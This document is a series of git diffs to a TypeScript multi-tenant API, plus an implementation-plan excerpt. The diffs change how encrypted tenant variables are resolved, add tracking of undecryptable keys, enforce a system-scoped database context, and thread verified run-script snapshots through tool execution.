-/** Module-private carrier. Not exported — see {@link TenantVariableScope}. */
+/**
+ * Module-private carrier. Not exported — see {@link TenantVariableScope}.
+ *
+ * `unreadableKeysByOrg` tracks keys whose winning row (per the org-over-
+ * partner precedence below) failed to decrypt, so that state stays
+ * distinguishable from a key that was never defined at all — see
+ * {@link unreadableForOrg}. It follows the exact same "not exported, reached
+ * only through a checked accessor" shape as `byOrg`.
+ */
 interface InternalTenantVariableScope extends TenantVariableScope {
   readonly byOrg: ReadonlyMap<string, ReadonlyMap<string, ResolvedVariable>>;
+  readonly unreadableKeysByOrg: ReadonlyMap<string, ReadonlySet<string>>;
 }
 
 function emptyScope(): InternalTenantVariableScope {
-  return { orgIds: new Set(), byOrg: new Map() };
+  return { orgIds: new Set(), byOrg: new Map(), unreadableKeysByOrg: new Map() };
 }
 
 /** Row shape decrypted by {@link decryptRow}. Matches the resolver's select projection. */
@@ -181,23 +190,48 @@ export async function loadTenantVariableScope(orgIds: string[]): Promise<TenantV
       const orgOwnedKeys = new Map<string, Set<string>>();
       for (const id of uniqueOrgIds) orgOwnedKeys.set(id, new Set());
 
+      // Rows whose winning precedence pass failed to decrypt — kept separate
+      // from `byOrg` so an unreadable key is never confused with one that was
+      // simply never defined (see {@link unreadableForOrg}).
+      const unreadableByOrg = new Map<string, Set<string>>();
+      for (const id of uniqueOrgIds) unreadableByOrg.set(id, new Set());
+
       for (const row of rows) {
         if (row.ownerOrgId === null) continue; // partner-wide; handled in the second pass
-        const resolved = decryptRow(row);
-        if (!resolved) continue;
-        byOrg.get(row.forOrgId)?.set(row.key, resolved);
+        // Claim this (org, key) for org-precedence BEFORE attempting the
+        // decrypt, regardless of whether it succeeds. An org row that fails
+        // to decrypt still WON the precedence contest against a same-key
+        // partner-wide row — it must shadow that partner value, not leave it
+        // exposed to the second pass below. Marking the claim only on a
+        // successful decrypt (the previous behaviour) let the partner-wide
+        // pass resolve right over an unreadable org override, silently
+        // substituting a DIFFERENT tenant scope's material into the org's
+        // resolution — a tenancy bug, not a convenience.
         orgOwnedKeys.get(row.forOrgId)?.add(row.key);
+        const resolved = decryptRow(row);
+        if (!resolved) {
+          unreadableByOrg.get(row.forOrgId)?.add(row.key);
+          continue;
+        }
+        byOrg.get(row.forOrgId)?.set(row.key, resolved);
       }
 
       for (const row of rows) {
         if (row.ownerOrgId !== null) continue; // org-owned; already handled above
-        if (orgOwnedKeys.get(row.forOrgId)?.has(row.key)) continue; // shadowed by an org override
+        if (orgOwnedKeys.get(row.forOrgId)?.has(row.key)) continue; // shadowed by an org override (readable or not)
         const resolved = decryptRow(row);
-        if (!resolved) continue;
+        if (!resolved) {
+          unreadableByOrg.get(row.forOrgId)?.add(row.key);
+          continue;
+        }
         byOrg.get(row.forOrgId)?.set(row.key, resolved);
       }
 
-      const scope: InternalTenantVariableScope = { orgIds: new Set(uniqueOrgIds), byOrg };
+      const scope: InternalTenantVariableScope = {
+        orgIds: new Set(uniqueOrgIds),
+        byOrg,
+        unreadableKeysByOrg: unreadableByOrg
+      };
       return scope;
     })
   );
@@ -225,6 +259,33 @@ export function resolveForOrg(scope: TenantVariableScope, orgId: string): Map<st
   }
   const internal = scope as InternalTenantVariableScope;
   return new Map(internal.byOrg.get(orgId) ?? []);
+}
+
+/**
+ * Keys whose winning row (per {@link loadTenantVariableScope}'s org-over-
+ * partner precedence) existed but failed to decrypt, for one org out of a
+ * previously-loaded snapshot.
+ *
+ * Deliberately distinct from "absent": a key that was never defined for this
+ * org appears in neither `resolveForOrg`'s map nor this set, while a key
+ * whose row exists but is unreadable appears ONLY here, never in
+ * `resolveForOrg`'s map (an unreadable variable must never resolve to a
+ * value — see {@link decryptRow}). This is the reporting channel #3409 PR4c
+ * needs to pin "unreadable" into an approval digest as something other than
+ * "absent".
+ *
+ * Same membership check as `resolveForOrg`, for the same reason — see its
+ * doc comment.
+ *
+ * Returns a fresh `Set` copy (never the snapshot's own set), mirroring
+ * `resolveForOrg`'s copy-out contract.
+ */
+export function unreadableForOrg(scope: TenantVariableScope, orgId: string): ReadonlySet<string> {
+  if (!scope.orgIds.has(orgId)) {
+    throw new Error(`Org ${orgId} is not in this snapshot`);
+  }
+  const internal = scope as InternalTenantVariableScope;
+  return new Set(internal.unreadableKeysByOrg.get(orgId) ?? []);
 }
 
 export interface SubstitutionOutcome {

--- a/apps/api/src/services/tenantVariableResolution.ts
+++ b/apps/api/src/services/tenantVariableResolution.ts
@@ -21,9 +21,16 @@ import { decryptTenantVariableValue } from './tenantVariables';
  * org-token-without-partnerId JWT among them — and if resolution rode
  * whichever context happened to be ambient, the SAME script could resolve a
  * DIFFERENT variable set depending on which call site dispatched it. Instead,
- * `loadTenantVariableScope` always elevates to a genuinely fresh system
- * context (see below) and produces one immutable snapshot that every call
- * site consumes identically.
+ * `loadTenantVariableScope` elevates to a genuinely fresh system context and
+ * produces one immutable snapshot that every call site consumes identically.
+ *
+ * That elevation is the default and is what all five dispatch call sites get.
+ * The ONE exception, since #3409 PR4c-1 Task 3b, is `opts.database`: a caller
+ * that is ALREADY inside a system-scoped context may hand its own connection
+ * in, and the query then runs on that connection rather than escaping to a
+ * second one. Same system scope, one fewer pooled connection — and the caller
+ * must be able to prove the "already system-scoped" half, which is asserted.
+ * See `loadTenantVariableScope`'s own doc comment for the full contract.
  *
  * Because system scope means Postgres RLS no longer constrains the query at
  * all, the WHERE clause in `loadTenantVariableScope` is the ONLY tenancy

--- a/apps/api/src/services/tenantVariableResolution.ts
+++ b/apps/api/src/services/tenantVariableResolution.ts
@@ -1,6 +1,12 @@
 import { and, eq, inArray, isNull, or } from 'drizzle-orm';
 import { replaceVariableTokens } from '@breeze/shared';
-import { db, runOutsideDbContext, withSystemDbAccessContext, type Database } from '../db';
+import {
+  db,
+  getCurrentDbAccessContext,
+  runOutsideDbContext,
+  withSystemDbAccessContext,
+  type Database
+} from '../db';
 import { organizations, tenantVariables } from '../db/schema';
 import { decryptTenantVariableValue } from './tenantVariables';
 
@@ -136,20 +142,27 @@ function decryptRow(row: RawResolvedRow): ResolvedVariable | null {
  * `withSystemDbAccessContext`), typically because it is computing atomically
  * inside a transaction it cannot afford to leave (a second pooled connection
  * held alongside the first is exactly the #1105 connection-hold class this
- * option exists to avoid — see #3409 PR4c-1 Task 3b). This function does not
- * itself elevate privilege when a database is supplied, so if the caller's
- * assertion is false — an unprivileged, RLS-constrained connection handed in
- * under the belief that it "would still be safe" — the query below silently
- * runs UNDER that connection's RLS instead of the intended system scope.
- * Because system scope is what makes the `WHERE o.id = ANY($1)` clause below
- * the query's ONLY tenancy boundary (see below), an RLS-constrained
- * connection wouldn't widen access — worse, it can silently NARROW the
- * result set (e.g. an org token whose JWT lacks `partnerId` losing every
- * partner-wide row) without erroring, which is a correctness bug wearing a
- * safety costume. Only pass `opts.database` when you can point at the
+ * option exists to avoid — see #3409 PR4c-1 Task 3b). **That assertion is
+ * CHECKED, not trusted**: the ambient `getCurrentDbAccessContext()` must
+ * report `scope === 'system'`, or this throws before querying.
+ *
+ * It has to be checked, because a false assertion is otherwise silent. This
+ * function does not itself elevate privilege when a database is supplied, so
+ * an unprivileged, RLS-constrained connection handed in under the belief that
+ * it "would still be safe" would simply run the query UNDER that connection's
+ * RLS. Because system scope is what makes the `WHERE o.id = ANY($1)` clause
+ * below the query's ONLY tenancy boundary (see below), that would not WIDEN
+ * access — worse, it can NARROW the result set (e.g. an org token whose JWT
+ * lacks `partnerId` losing every partner-wide row) without erroring. For the
+ * effect-digest callers that narrowing is a full-feature outage wearing a
+ * safety costume: the recomputed digest stops matching the pinned one and
+ * EVERY approved release fails `content_changed`. A loud throw is strictly
+ * better. Only pass `opts.database` when you can point at the
  * specific system-scoping call that is already open around your call site
- * (today: `computeEffectDigestOutcome`'s three call sites, all of which run
- * inside `withSystemDbAccessContext` — see effectDigest.ts and
+ * (today: the effect digest's three entry points — `computeEffectDigestOutcome`
+ * from intentService.ts and `computeEffectDigestForRelease` from
+ * jobs/intentReleaseWorker.ts and services/aiAgentSdk.ts — every one of which
+ * opens `withSystemDbAccessContext` around the call. See effectDigest.ts and
  * runScriptSnapshot.ts).
  *
  * ## Why the escape hatch (the `opts.database`-omitted path)
@@ -186,6 +199,16 @@ export async function loadTenantVariableScope(
   }
 
   if (opts?.database) {
+    // Enforce the caller obligation `opts.database` carries (see the doc
+    // above): the connection must already be system-scoped, because that is
+    // what leaves `WHERE o.id = ANY($1)` as the query's only tenancy boundary.
+    const ambientScope = getCurrentDbAccessContext()?.scope;
+    if (ambientScope !== 'system') {
+      throw new Error(
+        'loadTenantVariableScope: opts.database requires an already-open system-scoped DB context ' +
+          `(ambient scope: ${ambientScope ?? 'none'})`
+      );
+    }
     return queryScope(opts.database, uniqueOrgIds);
   }
 

--- a/apps/api/src/services/tenantVariableResolution.ts
+++ b/apps/api/src/services/tenantVariableResolution.ts
@@ -1,6 +1,6 @@
 import { and, eq, inArray, isNull, or } from 'drizzle-orm';
 import { replaceVariableTokens } from '@breeze/shared';
-import { db, runOutsideDbContext, withSystemDbAccessContext } from '../db';
+import { db, runOutsideDbContext, withSystemDbAccessContext, type Database } from '../db';
 import { organizations, tenantVariables } from '../db/schema';
 import { decryptTenantVariableValue } from './tenantVariables';
 
@@ -122,6 +122,38 @@ function decryptRow(row: RawResolvedRow): ResolvedVariable | null {
  * is empty — the common case for a dispatch batch with no `{{var.*}}` tokens
  * at all, via the `hasVariableTokens` short-circuit at the call site.
  *
+ * ## `opts.database` — an escape from the escape hatch, for ONE caller
+ *
+ * By default (`opts` omitted — what all five dispatch call sites do, and
+ * what MUST stay true for them), this function elevates to a genuinely fresh
+ * system context: see "Why the escape hatch" below.
+ *
+ * `opts.database`, when supplied, skips that elevation entirely and runs the
+ * query directly on the given connection instead — no `runOutsideDbContext`,
+ * no `withSystemDbAccessContext`. **Supplying a database is a caller
+ * assertion, not a request: it asserts the caller is ALREADY running inside
+ * a system-scoped context** (e.g. its own already-open
+ * `withSystemDbAccessContext`), typically because it is computing atomically
+ * inside a transaction it cannot afford to leave (a second pooled connection
+ * held alongside the first is exactly the #1105 connection-hold class this
+ * option exists to avoid — see #3409 PR4c-1 Task 3b). This function does not
+ * itself elevate privilege when a database is supplied, so if the caller's
+ * assertion is false — an unprivileged, RLS-constrained connection handed in
+ * under the belief that it "would still be safe" — the query below silently
+ * runs UNDER that connection's RLS instead of the intended system scope.
+ * Because system scope is what makes the `WHERE o.id = ANY($1)` clause below
+ * the query's ONLY tenancy boundary (see below), an RLS-constrained
+ * connection wouldn't widen access — worse, it can silently NARROW the
+ * result set (e.g. an org token whose JWT lacks `partnerId` losing every
+ * partner-wide row) without erroring, which is a correctness bug wearing a
+ * safety costume. Only pass `opts.database` when you can point at the
+ * specific system-scoping call that is already open around your call site
+ * (today: `computeEffectDigestOutcome`'s three call sites, all of which run
+ * inside `withSystemDbAccessContext` — see effectDigest.ts and
+ * runScriptSnapshot.ts).
+ *
+ * ## Why the escape hatch (the `opts.database`-omitted path)
+ *
  * MUST run inside `runOutsideDbContext(() => withSystemDbAccessContext(...))`
  * — BOTH wrappers, in that order. The route path calls this from inside a
  * held ORG-SCOPED request transaction (e.g. a script-run request), and a bare
@@ -144,102 +176,114 @@ function decryptRow(row: RawResolvedRow): ResolvedVariable | null {
  * already permitted to target) — this function does not itself authorize
  * anything, it only fetches exactly the rows for the orgs it is told about.
  */
-export async function loadTenantVariableScope(orgIds: string[]): Promise<TenantVariableScope> {
+export async function loadTenantVariableScope(
+  orgIds: string[],
+  opts?: { database?: Database }
+): Promise<TenantVariableScope> {
   const uniqueOrgIds = [...new Set(orgIds)];
   if (uniqueOrgIds.length === 0) {
     return emptyScope();
   }
 
-  return runOutsideDbContext(() =>
-    withSystemDbAccessContext(async () => {
-      // ONE query for every org in the snapshot, joining `organizations` so a
-      // partner-wide row (tenant_variables.org_id IS NULL) can be matched to
-      // each inheriting org's partner_id. A partner-wide row therefore comes
-      // back once PER inheriting org, each tagged with the org it is FOR
-      // (`forOrgId`) — never once globally, which is what makes attributing
-      // rows back to the right org below possible without a second query.
-      const rows: RawResolvedRow[] = await db
-        .select({
-          id: tenantVariables.id,
-          key: tenantVariables.key,
-          value: tenantVariables.value,
-          isSecret: tenantVariables.isSecret,
-          version: tenantVariables.version,
-          ownerOrgId: tenantVariables.orgId,
-          forOrgId: organizations.id
-        })
-        .from(organizations)
-        .innerJoin(
-          tenantVariables,
-          or(
-            eq(tenantVariables.orgId, organizations.id),
-            and(isNull(tenantVariables.orgId), eq(tenantVariables.partnerId, organizations.partnerId))
-          )
-        )
-        .where(inArray(organizations.id, uniqueOrgIds));
+  if (opts?.database) {
+    return queryScope(opts.database, uniqueOrgIds);
+  }
 
-      const byOrg = new Map<string, Map<string, ResolvedVariable>>();
-      for (const id of uniqueOrgIds) byOrg.set(id, new Map());
+  return runOutsideDbContext(() => withSystemDbAccessContext(() => queryScope(db, uniqueOrgIds)));
+}
 
-      // Org-owned rows always win over a same-key partner-wide row (resolution
-      // precedence: org > partner). Track which (org, key) pairs an org-owned
-      // row has already claimed so the partner-wide pass below never
-      // overwrites one, REGARDLESS of the order Postgres returns rows in (no
-      // ORDER BY is specified, and none is needed — precedence is enforced
-      // here, not by row order).
-      const orgOwnedKeys = new Map<string, Set<string>>();
-      for (const id of uniqueOrgIds) orgOwnedKeys.set(id, new Set());
-
-      // Rows whose winning precedence pass failed to decrypt — kept separate
-      // from `byOrg` so an unreadable key is never confused with one that was
-      // simply never defined (see {@link unreadableForOrg}).
-      const unreadableByOrg = new Map<string, Set<string>>();
-      for (const id of uniqueOrgIds) unreadableByOrg.set(id, new Set());
-
-      for (const row of rows) {
-        if (row.ownerOrgId === null) continue; // partner-wide; handled in the second pass
-        // Claim this (org, key) for org-precedence BEFORE attempting the
-        // decrypt, regardless of whether it succeeds. An org row that fails
-        // to decrypt still WON the precedence contest against a same-key
-        // partner-wide row — it must shadow that partner value, not leave it
-        // exposed to the second pass below. Marking the claim only on a
-        // successful decrypt (the previous behaviour) let the partner-wide
-        // pass resolve right over an unreadable org override: this org's own
-        // partner-wide DEFAULT would win over this org's own unreadable
-        // OVERRIDE — the very value the override exists to replace. (Not a
-        // cross-tenant leak: the join and every write below are keyed by
-        // `forOrgId`, so a different org's or partner's data can never reach
-        // this org's map.) Still a real tenancy bug — an override that fails
-        // to decrypt must fail the device, never quietly fall back to the
-        // default it was meant to shadow.
-        orgOwnedKeys.get(row.forOrgId)?.add(row.key);
-        const resolved = decryptRow(row);
-        if (!resolved) {
-          unreadableByOrg.get(row.forOrgId)?.add(row.key);
-          continue;
-        }
-        byOrg.get(row.forOrgId)?.set(row.key, resolved);
-      }
-
-      for (const row of rows) {
-        if (row.ownerOrgId !== null) continue; // org-owned; already handled above
-        if (orgOwnedKeys.get(row.forOrgId)?.has(row.key)) continue; // shadowed by an org override (readable or not)
-        const resolved = decryptRow(row);
-        if (!resolved) {
-          unreadableByOrg.get(row.forOrgId)?.add(row.key);
-          continue;
-        }
-        byOrg.get(row.forOrgId)?.set(row.key, resolved);
-      }
-
-      const scope: InternalTenantVariableScope = {
-        orgIds: new Set(uniqueOrgIds),
-        byOrg,
-        unreadableKeysByOrg: unreadableByOrg
-      };
-      return scope;
+/**
+ * The query + precedence-resolution body shared by both `loadTenantVariableScope`
+ * paths (escaped and caller-supplied `database`) — identical work, different
+ * connection. See `loadTenantVariableScope`'s doc comment for the tenancy
+ * contract this relies on (`WHERE o.id = ANY($1)` as the sole boundary).
+ */
+async function queryScope(database: Database, uniqueOrgIds: string[]): Promise<InternalTenantVariableScope> {
+  // ONE query for every org in the snapshot, joining `organizations` so a
+  // partner-wide row (tenant_variables.org_id IS NULL) can be matched to
+  // each inheriting org's partner_id. A partner-wide row therefore comes
+  // back once PER inheriting org, each tagged with the org it is FOR
+  // (`forOrgId`) — never once globally, which is what makes attributing
+  // rows back to the right org below possible without a second query.
+  const rows: RawResolvedRow[] = await database
+    .select({
+      id: tenantVariables.id,
+      key: tenantVariables.key,
+      value: tenantVariables.value,
+      isSecret: tenantVariables.isSecret,
+      version: tenantVariables.version,
+      ownerOrgId: tenantVariables.orgId,
+      forOrgId: organizations.id
     })
-  );
+    .from(organizations)
+    .innerJoin(
+      tenantVariables,
+      or(
+        eq(tenantVariables.orgId, organizations.id),
+        and(isNull(tenantVariables.orgId), eq(tenantVariables.partnerId, organizations.partnerId))
+      )
+    )
+    .where(inArray(organizations.id, uniqueOrgIds));
+
+  const byOrg = new Map<string, Map<string, ResolvedVariable>>();
+  for (const id of uniqueOrgIds) byOrg.set(id, new Map());
+
+  // Org-owned rows always win over a same-key partner-wide row (resolution
+  // precedence: org > partner). Track which (org, key) pairs an org-owned
+  // row has already claimed so the partner-wide pass below never
+  // overwrites one, REGARDLESS of the order Postgres returns rows in (no
+  // ORDER BY is specified, and none is needed — precedence is enforced
+  // here, not by row order).
+  const orgOwnedKeys = new Map<string, Set<string>>();
+  for (const id of uniqueOrgIds) orgOwnedKeys.set(id, new Set());
+
+  // Rows whose winning precedence pass failed to decrypt — kept separate
+  // from `byOrg` so an unreadable key is never confused with one that was
+  // simply never defined (see {@link unreadableForOrg}).
+  const unreadableByOrg = new Map<string, Set<string>>();
+  for (const id of uniqueOrgIds) unreadableByOrg.set(id, new Set());
+
+  for (const row of rows) {
+    if (row.ownerOrgId === null) continue; // partner-wide; handled in the second pass
+    // Claim this (org, key) for org-precedence BEFORE attempting the
+    // decrypt, regardless of whether it succeeds. An org row that fails
+    // to decrypt still WON the precedence contest against a same-key
+    // partner-wide row — it must shadow that partner value, not leave it
+    // exposed to the second pass below. Marking the claim only on a
+    // successful decrypt (the previous behaviour) let the partner-wide
+    // pass resolve right over an unreadable org override: this org's own
+    // partner-wide DEFAULT would win over this org's own unreadable
+    // OVERRIDE — the very value the override exists to replace. (Not a
+    // cross-tenant leak: the join and every write below are keyed by
+    // `forOrgId`, so a different org's or partner's data can never reach
+    // this org's map.) Still a real tenancy bug — an override that fails
+    // to decrypt must fail the device, never quietly fall back to the
+    // default it was meant to shadow.
+    orgOwnedKeys.get(row.forOrgId)?.add(row.key);
+    const resolved = decryptRow(row);
+    if (!resolved) {
+      unreadableByOrg.get(row.forOrgId)?.add(row.key);
+      continue;
+    }
+    byOrg.get(row.forOrgId)?.set(row.key, resolved);
+  }
+
+  for (const row of rows) {
+    if (row.ownerOrgId !== null) continue; // org-owned; already handled above
+    if (orgOwnedKeys.get(row.forOrgId)?.has(row.key)) continue; // shadowed by an org override (readable or not)
+    const resolved = decryptRow(row);
+    if (!resolved) {
+      unreadableByOrg.get(row.forOrgId)?.add(row.key);
+      continue;
+    }
+    byOrg.get(row.forOrgId)?.set(row.key, resolved);
+  }
+
+  return {
+    orgIds: new Set(uniqueOrgIds),
+    byOrg,
+    unreadableKeysByOrg: unreadableByOrg
+  };
 }
 
 /**

--- a/apps/api/src/services/tenantVariableResolution.ts
+++ b/apps/api/src/services/tenantVariableResolution.ts
@@ -204,9 +204,14 @@ export async function loadTenantVariableScope(orgIds: string[]): Promise<TenantV
         // partner-wide row — it must shadow that partner value, not leave it
         // exposed to the second pass below. Marking the claim only on a
         // successful decrypt (the previous behaviour) let the partner-wide
-        // pass resolve right over an unreadable org override, silently
-        // substituting a DIFFERENT tenant scope's material into the org's
-        // resolution — a tenancy bug, not a convenience.
+        // pass resolve right over an unreadable org override: this org's own
+        // partner-wide DEFAULT would win over this org's own unreadable
+        // OVERRIDE — the very value the override exists to replace. (Not a
+        // cross-tenant leak: the join and every write below are keyed by
+        // `forOrgId`, so a different org's or partner's data can never reach
+        // this org's map.) Still a real tenancy bug — an override that fails
+        // to decrypt must fail the device, never quietly fall back to the
+        // default it was meant to shadow.
         orgOwnedKeys.get(row.forOrgId)?.add(row.key);
         const resolved = decryptRow(row);
         if (!resolved) {

--- a/apps/api/src/services/toolExecutionContext.ts
+++ b/apps/api/src/services/toolExecutionContext.ts
@@ -1,0 +1,35 @@
+import type { RunScriptSnapshot } from './actionIntents/runScriptSnapshot';
+
+/**
+ * Material a release path has ALREADY resolved and verified against the
+ * approval's pinned effect digest, handed to the tool handler so it does not
+ * re-query — a second read reopens the check/use window the digest exists to
+ * close (#3409 PR4c-1).
+ *
+ * DELIBERATELY NARROW AND DELIBERATELY EXPLICIT. Two "simplifications" look
+ * tempting from the handler side; both are wrong:
+ *
+ *   - NOT on `AuthContext`. That is a CALLER IDENTITY — who is asking, and what
+ *     they may reach. It is built by auth middleware, is the same object for
+ *     every tool a caller invokes, and is read by tenancy gates. Verified
+ *     release material is a per-invocation EXECUTION INPUT produced by the
+ *     release path; hanging it off the identity would make every downstream
+ *     tenancy check read from an object that a release path can extend.
+ *
+ *   - NOT inside `args`. `args` is the digest's OWN input: it is the immutable
+ *     `action_intents.arguments` column the approver approved and the digest was
+ *     computed over. Smuggling the verification RESULT back into the digest's
+ *     INPUT would make the pinned material self-referential, and any handler
+ *     that echoes or re-serializes its input would start emitting it.
+ *
+ * So it travels as its own explicit parameter: greppable, typed, and incapable
+ * of silently failing to propagate the way an ambient/AsyncLocalStorage store
+ * can (the inline release path verifies in `aiAgentSdk.ts` and executes later
+ * from `aiAgentSdkTools.ts`'s handler factory — not one async scope).
+ *
+ * HOST-INTERNAL. `executeTool` passes this to CORE handlers only; extension
+ * handlers are invoked with exactly two arguments. See `executeTool`.
+ */
+export type ToolExecutionContext = {
+  verifiedRunScript?: RunScriptSnapshot;
+};

--- a/apps/api/src/services/toolExecutionContext.ts
+++ b/apps/api/src/services/toolExecutionContext.ts
@@ -3,36 +3,6 @@ import type { RunScriptSnapshot } from './actionIntents/runScriptSnapshot';
 import type { TenantVariableScope } from './tenantVariableResolution';
 
 /**
- * Material a release path has ALREADY resolved and verified against the
- * approval's pinned effect digest, handed to the tool handler so it does not
- * re-query — a second read reopens the check/use window the digest exists to
- * close (#3409 PR4c-1).
- *
- * DELIBERATELY NARROW AND DELIBERATELY EXPLICIT. Two "simplifications" look
- * tempting from the handler side; both are wrong:
- *
- *   - NOT on `AuthContext`. That is a CALLER IDENTITY — who is asking, and what
- *     they may reach. It is built by auth middleware, is the same object for
- *     every tool a caller invokes, and is read by tenancy gates. Verified
- *     release material is a per-invocation EXECUTION INPUT produced by the
- *     release path; hanging it off the identity would make every downstream
- *     tenancy check read from an object that a release path can extend.
- *
- *   - NOT inside `args`. `args` is the digest's OWN input: it is the immutable
- *     `action_intents.arguments` column the approver approved and the digest was
- *     computed over. Smuggling the verification RESULT back into the digest's
- *     INPUT would make the pinned material self-referential, and any handler
- *     that echoes or re-serializes its input would start emitting it.
- *
- * So it travels as its own explicit parameter: greppable, typed, and incapable
- * of silently failing to propagate the way an ambient/AsyncLocalStorage store
- * can (the inline release path verifies in `aiAgentSdk.ts` and executes later
- * from `aiAgentSdkTools.ts`'s handler factory — not one async scope).
- *
- * HOST-INTERNAL. `executeTool` passes this to CORE handlers only; extension
- * handlers are invoked with exactly two arguments. See `executeTool`.
- */
-/**
  * One `run_script` release, resolved once and verified against the approval's
  * pinned digest.
  *
@@ -67,6 +37,36 @@ export type VerifiedRunScript = {
   scope: TenantVariableScope;
 };
 
+/**
+ * Material a release path has ALREADY resolved and verified against the
+ * approval's pinned effect digest, handed to the tool handler so it does not
+ * re-query — a second read reopens the check/use window the digest exists to
+ * close (#3409 PR4c-1).
+ *
+ * DELIBERATELY NARROW AND DELIBERATELY EXPLICIT. Two "simplifications" look
+ * tempting from the handler side; both are wrong:
+ *
+ *   - NOT on `AuthContext`. That is a CALLER IDENTITY — who is asking, and what
+ *     they may reach. It is built by auth middleware, is the same object for
+ *     every tool a caller invokes, and is read by tenancy gates. Verified
+ *     release material is a per-invocation EXECUTION INPUT produced by the
+ *     release path; hanging it off the identity would make every downstream
+ *     tenancy check read from an object that a release path can extend.
+ *
+ *   - NOT inside `args`. `args` is the digest's OWN input: it is the immutable
+ *     `action_intents.arguments` column the approver approved and the digest was
+ *     computed over. Smuggling the verification RESULT back into the digest's
+ *     INPUT would make the pinned material self-referential, and any handler
+ *     that echoes or re-serializes its input would start emitting it.
+ *
+ * So it travels as its own explicit parameter: greppable, typed, and incapable
+ * of silently failing to propagate the way an ambient/AsyncLocalStorage store
+ * can (the inline release path verifies in `aiAgentSdk.ts` and executes later
+ * from `aiAgentSdkTools.ts`'s handler factory — not one async scope).
+ *
+ * HOST-INTERNAL. `executeTool` passes this to CORE handlers only; extension
+ * handlers are invoked with exactly two arguments. See `executeTool`.
+ */
 export type ToolExecutionContext = {
   verifiedRunScript?: VerifiedRunScript;
 };

--- a/apps/api/src/services/toolExecutionContext.ts
+++ b/apps/api/src/services/toolExecutionContext.ts
@@ -1,4 +1,6 @@
+import type { scripts } from '../db/schema';
 import type { RunScriptSnapshot } from './actionIntents/runScriptSnapshot';
+import type { TenantVariableScope } from './tenantVariableResolution';
 
 /**
  * Material a release path has ALREADY resolved and verified against the
@@ -30,6 +32,41 @@ import type { RunScriptSnapshot } from './actionIntents/runScriptSnapshot';
  * HOST-INTERNAL. `executeTool` passes this to CORE handlers only; extension
  * handlers are invoked with exactly two arguments. See `executeTool`.
  */
+/**
+ * One `run_script` release, resolved once and verified against the approval's
+ * pinned digest.
+ *
+ * THREE SIBLINGS, ONE OBSERVATION. All three come from the same
+ * `buildRunScriptSnapshot` call, and they are kept flat rather than nested for
+ * the reason `runScriptSnapshot.ts`'s header spells out: `snapshot` is pure
+ * digest material, and `scope` holds DECRYPTED tenant-variable plaintext.
+ * Hanging the scope off the snapshot would make one stray
+ * `JSON.stringify(snapshot)` in a log or audit path a leak; as siblings, the
+ * leak is structurally absent rather than merely avoided.
+ *
+ * They also travel together or not at all — a handler given the row but not
+ * the scope would silently re-resolve variables the digest already pinned —
+ * which is why this is one grouped payload and not three optional fields on
+ * `ToolExecutionContext`.
+ */
+export type VerifiedRunScript = {
+  /** What the effect digest was computed over. Never carries a variable VALUE. */
+  snapshot: RunScriptSnapshot;
+  /**
+   * The whole `scripts` row that observation read. Dispatch needs columns the
+   * digest does not pin (`osTypes`, `partnerId`, the raw `parameters` jsonb),
+   * and re-reading for them would reopen the window the digest closes.
+   *
+   * Read under a SYSTEM context with no org filter, so a handler consuming it
+   * still owes the caller's own authorization checks — see `run_script` in
+   * `aiToolsScripts.ts`, which re-applies the org filter its skipped query
+   * carried.
+   */
+  scriptRow: typeof scripts.$inferSelect;
+  /** The exact resolved scope the digest's variable references were pinned from. */
+  scope: TenantVariableScope;
+};
+
 export type ToolExecutionContext = {
-  verifiedRunScript?: RunScriptSnapshot;
+  verifiedRunScript?: VerifiedRunScript;
 };

--- a/docs/superpowers/plans/2026-08-15-pr4c1-digest-pinning-snapshot.md
+++ b/docs/superpowers/plans/2026-08-15-pr4c1-digest-pinning-snapshot.md
@@ -1,0 +1,401 @@
+# Tenant Variables #3409 — PR4c-1 Implementation Plan (approval-digest pinning + verified release snapshot)
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Make an approved `run_script` action-intent fail closed when the material it will actually execute has drifted — specifically when a tenant variable is rotated, rebound, deleted, reclassified `isSecret`, newly overridden at org level, or has become unreadable — and close the check/use race by resolving **once** into a verified snapshot that is then handed to dispatch instead of re-queried.
+
+**This PR ships no secret delivery.** Secrets remain blocked everywhere (PR4c-2 activates them). This is the integrity foundation that must land first.
+
+**Why first (settled by advisor quorum, Opus + codex gpt-5.6-sol xhigh, 2026-08-15, user-approved):** PR3 already introduced approval drift. `effectDigest.ts` excludes `scripts.parameters` from the digest on the explicit stated grounds that the column "has no effect on execution" — but PR3 made `scriptDispatch` consume that column (the `hasTenantVariableBoundParameters` branch) to drive variable-scope loading and per-parameter bindings. **That comment's premise is false today, and the exclusion is a live approval-integrity bug.** Activating secrets before fixing it would let a rebound or rotated credential ride an unchanged digest straight through an approval.
+
+**Tech Stack:** TypeScript, Hono, Drizzle ORM, PostgreSQL, Vitest, Zod 4.
+
+---
+
+## Global Constraints
+
+- **Branch:** `ToddHebebrand/tenant-variables-pr4c`, based on `origin/main` (which now contains PR4a #3557 and PR4b #3562). Worktree `/Users/toddhebebrand/orca/workspaces/breeze/tenant-variables-pr4c`.
+- **Never put a resolved variable VALUE into digest material.** The digest is a sha256 input and lands in `action_intents.effect_digest`, which is widely readable. Pin a stable *reference* — variable id + version + `isSecret` — never the plaintext. A reviewer will check this specifically.
+- **Fail closed, in both directions.** Unresolvable, unreadable, or ambiguous state must produce a *mismatch or an unresolved outcome*, never a silent pass. Where the existing code has a fail-soft path, do not copy it.
+- **`isSecret` can flip WITHOUT a version bump** (`services/tenantVariables.ts`, the update path). Pinning version alone misses it — pin `isSecret` explicitly, and treat a flip in **either** direction as drift.
+- **Distinguish absent from unreadable.** Today `decryptRow` catches, warns, returns null, and the row is simply omitted from the scope — indistinguishable from "no such variable". An unreadable variable must block approval and release rather than looking absent.
+- **Digest material is versioned.** Bump the run_script material to a `v: 2` envelope. See the Deployment Hazard section — this is deliberate and must be release-noted.
+- **Do not widen `AuthContext` and do not smuggle the snapshot through `args`.** The snapshot travels via an explicit, typed parameter (Task 6).
+- **Test commands:** `pnpm --filter @breeze/api test -- <path>` for a slice; the **full** API suite before opening the PR. Contract/integration suites are mandatory here (see Task 8) — `effectDigestToctou.integration.test.ts` and `effectDigestCoverage.contract.test.ts` both guard this exact surface, and the integration suites do NOT run in the unit job.
+- **Mutation-verify every guard.** Force it off, confirm the new tests fail *and nothing else does*, restore.
+
+---
+
+## Verified seams (checked against this branch — do not re-derive)
+
+| What | Where |
+|---|---|
